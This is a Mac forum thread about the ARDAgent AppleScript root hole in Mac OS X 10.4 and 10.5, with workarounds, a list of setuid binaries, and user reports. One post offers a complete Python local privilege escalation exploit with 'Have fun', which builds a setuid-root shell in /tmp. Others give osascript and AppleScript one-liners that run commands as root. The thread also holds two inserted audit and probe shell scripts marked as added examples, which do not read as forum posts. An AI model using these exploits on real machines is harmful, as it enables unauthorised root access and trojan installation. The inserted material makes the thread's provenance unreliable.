
zorinlynx

macrumors G3
Original poster
May 31, 2007
Florida, USA
From Slashdot:

"Half the Mac OS X boxes in the world (confirmed on Mac OS X 10.4 Tiger and 10.5 Leopard) can be rooted through AppleScript: osascript -e 'tell app "ARDAgent" to do shell script "whoami"'; Works for normal users and admins, provided the normal user wasn't switched to via fast user switching. Secure? I think not."

If you administrate Mac OS X systems in a lab environment where local users shouldn't be able to get root, this can affect you. Thankfully for most of us, the user must be logged in *locally* (into the window system) for this to work.

A quick workaround is to remove the suid bit on the ARDAgent:

sudo chmod u-s /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/ARDAgent

This may be undone by repair permissions, though, and possibly breaks Remote Desktop, so keep an eye on it until Apple officially patches the bug.
 
Local privilege escalation.

Code:
#!/usr/bin/python
# Python 2, as shipped with 10.4/10.5; commands.getoutput() runs each string through sh.
import commands

# Step 1: write and compile a tiny C program that sets uid/gid 0 and spawns a shell.
# (The two #includes declare setuid()/setgid()/seteuid() and system(); the original
# relied on implicit declarations, which gcc only warned about.)
payload = "printf '%s\\n' '#include <stdlib.h>' '#include <unistd.h>' 'int main(void) { setuid(0); setgid(0); seteuid(0); system(\"/bin/sh -i\"); return 0; }' > /tmp/r00t.c"
buildcmd = "gcc /tmp/r00t.c -o /tmp/r00ted"
# Step 2: the bug. ARDAgent is setuid root and accepts AppleEvents, so the
# `do shell script` it is sent runs as root and makes /tmp/r00ted setuid root.
escalate = "osascript -e 'tell app \"ARDAgent\" to do shell script \"chown root /tmp/r00ted; chmod 4777 /tmp/r00ted\"'"
print 'Building your shell', commands.getoutput(payload), commands.getoutput(buildcmd)
print commands.getoutput(escalate)

print "r00t is located at /tmp/r00ted"

Have fun.
 
Don't worry, guys, knowing how seriously Apple treats known vulnerabilities (the Safari carpet bombing being the prime example), we can expect an update any year now :rolleyes:
 
There is no way of defending against this - it is a massive hole and Apple should hang their heads in shame. Why the hell does ARDAgent have the SUID bit set when it can run shell scripts?!
It would be trivial to use this exploit to install a trojan with root privileges and without any secondary authentication, and the question has to be: are there any more of these hidden away in OS X?
The Apple world just got a bit more dangerous...
 
I would consider all binaries that Apple has given SUID bits to suspect. They've proven that they can't be trusted with them.

/System/Library/CoreServices/Expansion Slot Utility.app/Contents/Resources/PCIELaneConfigTool
/System/Library/CoreServices/Finder.app/Contents/Resources/OwnerGroupTool
/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/ARDAgent
/System/Library/CoreServices/SecurityFixer.app/Contents/Resources/securityFixerTool
/System/Library/Extensions/webdav_fs.kext/Contents/Resources/load_webdav
/System/Library/Filesystems/AppleShare/afpLoad
/System/Library/Filesystems/AppleShare/check_afp.app/Contents/MacOS/check_afp
/System/Library/Frameworks/ApplicationServices.framework/Versions/A/Frameworks/PrintCore.framework/Versions/A/Resources/PrinterSharingTool
/System/Library/Frameworks/SystemConfiguration.framework/Versions/A/Resources/SCHelper
/System/Library/PreferencePanes/DateAndTime.prefPane/Contents/Resources/TimeZone.prefPane/Contents/Resources/TimeZoneSettingTool
/System/Library/Printers/IOMs/LPRIOM.plugin/Contents/MacOS/LPRIOMHelper
/System/Library/Printers/Libraries/aehelper
/System/Library/Printers/Libraries/csregprinter
/System/Library/PrivateFrameworks/Admin.framework/Versions/A/Resources/readconfig
/System/Library/PrivateFrameworks/Admin.framework/Versions/A/Resources/writeconfig
/System/Library/PrivateFrameworks/DesktopServicesPriv.framework/Versions/A/Resources/Locum
/System/Library/PrivateFrameworks/DiskManagement.framework/Versions/A/Resources/DiskManagementTool
/System/Library/PrivateFrameworks/Install.framework/Versions/A/Resources/runner
/System/Library/PrivateFrameworks/NetworkConfig.framework/Versions/A/Resources/NetCfgTool
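A check to go with the workaround and the setuid list above. The script below is an added example, not code posted in this thread or shipped by Apple. It inventories setuid executables, compares them with a saved baseline so that a new setuid file (such as the /tmp/r00ted the exploit above leaves behind) stands out, and reports whether ARDAgent's setuid bit is still cleared, since Repair Permissions can put it back. The baseline path and the directory list are assumptions; adjust them for your lab image.

```sh
#!/bin/sh
# Added example, not code from this thread: inventory setuid executables,
# diff them against a saved baseline, and verify the ARDAgent workaround
# (chmod u-s) is still in place. Assumes POSIX sh with find, sort and comm.

ARDAGENT="${ARDAGENT:-/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/ARDAgent}"
BASELINE="${BASELINE:-/var/root/setuid-baseline.txt}"   # hypothetical location

# list_setuid DIR...: sorted paths of regular files with the setuid bit set.
# -perm -4000 matches the bit regardless of owner; the caller prints the
# owner, because a setuid file owned by root is the one that matters.
list_setuid() {
    find "$@" -type f -perm -4000 2>/dev/null | sort
}

# new_setuid BASELINE DIR...: setuid files present now but absent from the
# baseline. Scanning /tmp and /var/tmp with this catches a leftover
# setuid-root /tmp/r00ted from the exploit posted above.
new_setuid() {
    baseline=$1; shift
    list_setuid "$@" | comm -13 "$baseline" -
}

# ardagent_workaround_applied: returns 0 if the setuid bit is off,
# 1 if it is still set, 2 if the binary is missing (no Remote Management).
ardagent_workaround_applied() {
    [ -e "$ARDAGENT" ] || return 2
    if [ -u "$ARDAGENT" ]; then return 1; fi
    return 0
}

# The audit runs only with --audit so the file can also be sourced for its functions.
if [ "${1:-}" = "--audit" ]; then
    dirs="/System /Library /usr /bin /sbin /Applications"
    if [ ! -f "$BASELINE" ]; then
        list_setuid $dirs > "$BASELINE"
        echo "baseline written to $BASELINE; re-run to compare against it"
        exit 0
    fi
    echo "setuid files not in baseline:"
    new_setuid "$BASELINE" $dirs /tmp /var/tmp | while IFS= read -r f; do
        ls -l "$f"     # owner column: root-owned entries are the ones to chase
    done
    ardagent_workaround_applied && rc=0 || rc=$?
    case $rc in
        0) echo "ARDAgent: setuid bit cleared (workaround in place)" ;;
        1) echo "ARDAgent: still setuid root; run: sudo chmod u-s $ARDAGENT" ;;
        2) echo "ARDAgent: not present" ;;
    esac
fi
```

Run it once as root to write the baseline, then on a schedule with `--audit`; anything it lists that you did not install, and any "still setuid root" line after a Repair Permissions, is what the thread is warning about.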
 
I cannot reproduce this on my Leopard system:

(spartan) ~ % osascript -e 'tell app "ARDAgent" to do shell script "whoami"';
23:47: execution error: ARDAgent got an error: "whoami" doesn’t understand the do shell script message. (-1708)

(spartan) ~ % uname -a
Darwin spartan.example.com 9.3.0 Darwin Kernel Version 9.3.0: Fri May 23 00:49:16 PDT 2008; root:xnu-1228.5.18~1/RELEASE_I386 i386

My copy of ARDAgent has the suid bit set but I don't appear to be vulnerable...

(spartan) ~ % ls -l /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/ARDAgent
-rwsr-xr-x 1 root wheel 1439952 Nov 15 2007 /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/ARDAgent*


I am logged into the desktop running the above commands from terminal app.

Was this fixed in 10.5.1, 10.5.2, or 10.5.3 already?

Dan
 
Still worked with 10.5.3 for me

gamma:~ priller$ osascript -e 'tell app "ARDAgent" to do shell script "whoami"';

root
 
This may be undone by repair permissions, though, and possibly breaks Remote Desktop, so keep an eye on it until Apple officially patches the bug.
If Remote Desktop is enabled, ARDAgent will already be running as the local user; launchd ignores setuid.
 
And as was said, fully exploitable via scripts. For instance, make a nicely trusted AppleScript, saved as an Application:

Code:
on run
	do shell script "osascript -e 'tell app \"ARDAgent\" to do shell script \"say quack\"'"
end run

You'll notice that it says it with the default voice, not the one set for your account.

So how long before we see malware or trojans?
 
You don't need to use osascript if you're already in an AppleScript!

Code:
on run
	tell app "ARDAgent" to do shell script "say quack"
end run
 
First, this should be posted on the top page of Macrumors.
Second, to SC68CAL, "do shell script" is not really the functionality of ARDAgent; it is there FOR ANY SCRIPTABLE APP as a part of the AppleScript-ability, and any GUI app which is registered with LaunchServices can be sent an AppleEvent.
Apple is to blame for giving setuid apps AppleScript-ability. It's a gaping hole in the security!

In your list of setuid'ed executables, the only other GUI app is check_afp.app.
But
Code:
osascript -e 'tell app "check_afp" to do shell script "whoami" '
didn't "work" on my machine. Mmm ...
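To answer "are there any more of these?" systematically instead of one app at a time, here is an added shell script (not from the thread, not Apple's) that takes a setuid inventory, keeps only the executables that are an .app bundle's main binary under Contents/MacOS, and asks each one to run `id -u` via `do shell script`. Only the bundle's main executable receives AppleEvents, which is why a setuid helper under Contents/Resources (OwnerGroupTool, PCIELaneConfigTool) is not reachable with `tell app` and is skipped. A reply of 0 means the shell ran as root; another uid means the app handled the event but was already running as you (the launchd case noted above); an error such as -1708 means the event was not handled, as with check_afp. The sample list is constructed from the paths posted above; run it with `--probe` from a local GUI login, since the thread notes the hole needs the console session.

```sh
#!/bin/sh
# Added example, not code from this thread: probe which setuid app bundles
# honour `tell app "X" to do shell script`, the route ARDAgent is exploited by.
# Assumptions: macOS with osascript, run from the console (GUI) session; input
# is a list of setuid executable paths, one per line, e.g. from
#   find /System /Library /Applications -type f -perm -4000

# app_names: from setuid executable paths on stdin, print "Name<TAB>path" for
# those that are an .app bundle's main executable (Contents/MacOS). A setuid
# tool under Contents/Resources is a separate process and never sees the event.
app_names() {
    while IFS= read -r path; do
        case "$path" in
            *.app/Contents/MacOS/*)
                bundle=${path%.app/Contents/MacOS/*}   # .../RemoteManagement/ARDAgent
                bundle=${bundle##*/}                    # ARDAgent
                printf '%s\t%s\n' "$bundle" "$path"
                ;;
        esac
    done
}

# probe_app NAME: ask the app to run `id -u` through do shell script.
# Prints "0" when the shell ran as root, another uid when the app was already
# running as the logged-in user, or the osascript error text.
probe_app() {
    osascript -e "tell app \"$1\" to do shell script \"id -u\"" 2>&1
}

# Constructed sample input: four paths taken from the setuid list in this thread.
SAMPLE_SETUID_LIST='/System/Library/CoreServices/Finder.app/Contents/Resources/OwnerGroupTool
/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/ARDAgent
/System/Library/Filesystems/AppleShare/check_afp.app/Contents/MacOS/check_afp
/System/Library/PrivateFrameworks/Admin.framework/Versions/A/Resources/writeconfig'

# --probe [FILE]: read paths from FILE, else use the sample list; one line per bundle.
if [ "${1:-}" = "--probe" ]; then
    tab=$(printf '\t')
    { if [ -n "${2:-}" ]; then cat "$2"; else printf '%s\n' "$SAMPLE_SETUID_LIST"; fi; } |
    app_names | while IFS="$tab" read -r name path; do
        printf '%s (%s): %s\n' "$name" "$path" "$(probe_app "$name" | head -n 1)"
    done
fi
```

Typical use: `find /System /Library /Applications -type f -perm -4000 > setuid.txt; sh probe.sh --probe setuid.txt`. Each probe launches the app if it is not running, so expect Dock bounces; a bundle that answers 0 deserves the same `chmod u-s` treatment as ARDAgent until it is patched.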
 
For a relative Mac newbie most of the above posts read like Greek. :confused:

Can anyone tell me if there is a simple way to detect if the Trojan is already on my system?
 
For a relative Mac newbie most of the above posts read like Greek. :confused:

Can anyone tell me if there is a simple way to detect if the Trojan is already on my system?

Not really; any malware's first goal, trojan or otherwise, is to make sure nobody can see it. This is why Windows users have such problems, even when they run all kinds of security programs: you basically have to be familiar with what's supposed to be on the system and spot things that look fishy.
 